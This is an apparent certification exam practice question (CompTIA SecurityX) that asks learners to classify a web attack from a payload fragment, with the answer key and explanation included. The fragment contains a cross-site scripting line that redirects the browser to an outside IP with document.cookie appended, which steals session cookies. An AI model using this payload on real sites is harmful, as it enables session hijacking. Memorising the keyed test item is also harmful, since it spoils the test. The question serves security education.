CompTIA SecurityX (CAS-005) — Question 302

During a forensic review of a cybersecurity incident, a security engineer collected a portion of the payload used by an attacker on a comprised web server. Given the following portion of the code:

..asd...document.location="https://10.10.1.2/?"x“+document.cookie; ..12..fa..<>...ash214%621...41..2...8.8.

Which of the following best describes this incident?

Answer options

• A. XSRF attack
• B. Command injection
• C. Stored XSS
• D. SQL injection

Correct answer: C

Explanation

The correct answer is C, Stored XSS, because the code exploits the document.cookie property, indicating that the attacker is attempting to access cookies stored in the user's browser. Options A, B, and D do not fit this scenario, as XSRF involves unauthorized commands on behalf of a user, command injection involves executing arbitrary commands on the server, and SQL injection targets database queries rather than manipulating client-side scripts.